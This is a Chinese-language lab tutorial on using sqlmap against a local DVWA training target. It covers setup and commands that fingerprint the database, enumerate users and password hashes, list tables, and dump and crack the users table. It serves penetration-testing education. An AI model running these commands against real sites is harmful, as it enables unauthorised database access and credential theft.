使用SQLmap进行SQL注入漏洞检测与利用
SQL注入基础
SQL注入是一种常见的Web安全漏洞,攻击者通过在输入字段中插入恶意SQL代码,诱使服务器执行非预期的数据库操作。这种攻击方式主要针对Web应用中未对用户输入进行严格过滤的场景,特别是那些直接将用户输入拼接到SQL查询语句中的应用。
历史上许多知名网站的数据泄露事件都与SQL注入有关,包括用户账户信息的大量丢失。因此,了解如何检测和防范此类漏洞对于Web安全至关重要。
SQLmap工具介绍
SQLmap是一个强大的开源渗透测试工具,专门用于自动化检测和利用SQL注入漏洞。它支持多种数据库系统,并提供了丰富的功能,包括数据库指纹识别、文件系统访问以及命令执行等高级特性。该工具可以从官方网站免费获取。
实验环境搭建
本实验使用两台虚拟机:
- 攻击机:192.168.1.6(安装SQLmap)
- 目标机:192.168.1.7(部署DVWA渗透测试平台)
在攻击机上安装SQLmap
首先确保已安装Python环境:
[root@attacker ~]# yum -y install python
[root@attacker ~]# python -V
Python 2.7.5
解压并运行SQLmap:
[root@attacker ~]# cd /usr/local/
[root@attacker local]# tar zxf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
[root@attacker local]# mv sqlmapproject-sqlmap-7eab1bc/ sqlmap/
[root@attacker local]# cd sqlmap
[root@attacker sqlmap]# ./sqlmap.py
创建便捷访问链接:
[root@attacker sqlmap]# ln -s /usr/local/sqlmap/sqlmap.py /usr/bin/sqlmap
[root@attacker sqlmap]# sqlmap -h
在目标机上部署DVWA
安装必要的服务组件:
[root@target ~]# yum -y install httpd php php-mysql php-gd mariadb-server mariadb
[root@target ~]# systemctl start httpd && systemctl enable httpd
[root@target ~]# systemctl start mariadb && systemctl enable mariadb
配置数据库并部署DVWA:
[root@target ~]# mysqladmin -u root password "123456"
[root@target ~]# unzip -d /var/www/html/ DVWA-1.9.zip
[root@target ~]# chown -R apache:apache /var/www/html/DVWA-19/
[root@target ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php
调整PHP配置以满足DVWA要求:
[root@target ~]# vim /etc/php.ini
allow_url_include = On
[root@target ~]# systemctl restart httpd
SQL注入检测实践
在开始测试前,需先获取有效的会话Cookie。通过浏览器开发者工具可获得相关认证信息。
基本数据库信息探测
使用以下命令获取目标数据库基本信息:
[root@attacker sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookies="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -b --current-db --current-user
关键参数说明:
- -u:指定目标URL
- --cookies:提供会话认证信息
- -b:获取数据库版本信息
- --current-db:显示当前数据库名
- --current-user:显示当前数据库用户
用户凭证提取
枚举数据库用户及密码哈希:
[root@attacker sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" --string="Surname" --users --password
参数解释:
- --string:指定页面确认字符串
- --users:列出数据库用户
- --password:获取用户密码哈希
数据表结构分析
查看指定数据库中的数据表:
[root@attacker sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa --tables
查看特定表的字段结构:
[root@attacker sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users --columns
敏感数据导出
提取用户表中的关键字段数据:
[root@attacker sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users -C user,password --dump
此过程将自动尝试破解获取的密码哈希值,并将结果保存至CSV文件供后续分析使用。
